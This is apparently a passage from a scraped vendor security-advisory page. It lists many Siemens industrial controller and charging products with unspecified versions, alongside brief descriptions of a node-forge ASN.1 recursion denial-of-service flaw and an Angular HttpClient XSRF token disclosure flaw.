Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
An Uncontrolled Recursion vulnerability in node-forge versions 1.3.1 and below allows remote attackers to exploit ASN.1 structures, leading to Denial-of-Service via stack exhaustion during TLS connections or certificate parsing.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
The document outlines a vulnerability in Angular's HttpClient that allows unauthorized disclosure of the XSRF token due to improper handling of protocol-relative URLs, affecting versions prior to 19.2.16, 20.3.14, and 21.0.1.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
